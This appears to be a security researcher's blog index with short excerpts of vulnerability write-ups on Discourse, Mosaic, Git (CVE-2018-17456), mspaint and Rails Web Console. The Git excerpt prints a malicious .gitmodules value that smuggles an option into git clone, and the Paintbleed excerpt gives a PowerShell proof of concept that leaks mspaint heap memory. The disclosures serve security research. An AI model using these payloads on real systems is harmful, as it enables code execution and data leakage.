Discoure themes OS Command Injection

Discourse offers the possibility to install themes from remote Git repositories. Before this commit it was possible to inject OS commands via a maliciously crafted theme which is pulled via Git. The root cause for the issue lay in the parsing of the .discourse-compatibility file which is a yaml file containing a mapping of the target discourse version and a git version to be checked out for that specific discourse version.
Read more →

Mosaic “0day”

While attendig WarCon in 2016 greg and I sat together in .mario’s talk My Sweet Innocence Exposed - Eleven Reasons why we will all miss you, “e”, his rants about MSIE reminded us of the fact that we both had the task of finding a Mosaic 0day still on our agenda. So the evening after the talk we sat down together and started approaching that goal. The latest version of Mosaic for Unix which can be found at ftp://ftp.
Read more →

CVE-2018-17456

I’ve gotten a couple of questions about exploitation for the recent RCE in Git. So here we go with some technical details. TL;DR Here is a PoC repository. Exploitation The .gitmodules file looks as follows: [submodule "x:x"] path = x:x url = -u./payload The actual command being injected is set by the url, -u./payload points the upload-pack flag of git clone to the payload shell script. Note also the : within the path, this part is needed to actually get the payload script executed.
Read more →

Paintbleed

Summary mspaint.exe does not properly verify Dib data from the clipboard. Therefore we can craft some Dib data in the clipboard which e.g. suggests a size of 0x100 by 0x100 pixels and contains not more than the Dib header itself. So the acutal image data rendered by mspaint.exe is its own heap data =) PoC Run the following code in PowerShell: $bytes = 40,0,0,0,0,1,0,0,0,1,0,0,1,0,24,0,0,0,0,0,136,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 [System.Windows.Forms.Clipboard]::SetData([System.Windows.Forms.DataFormats]::Dib,[System.IO.MemoryStream]::new($bytes)) Afterwards open mspaint.exe and paste. The result should be the graphical representation of some of mspaints.
Read more →

WebConsole IP Whitelist bypass

With the release of Ruby on Rails 4.2 the so called Web Console was introduced. As the Web Console documentation states: Web Console is built explicitly for Rails 4. By default the Web Console is available in the Rails Development Environment and allows only the IPs 127.0.0.1 and ::1 to access the console in order to evaluate arbitrary Ruby statements for the purpose of debugging. However with Rails Versions 4.1 and 4.
Read more →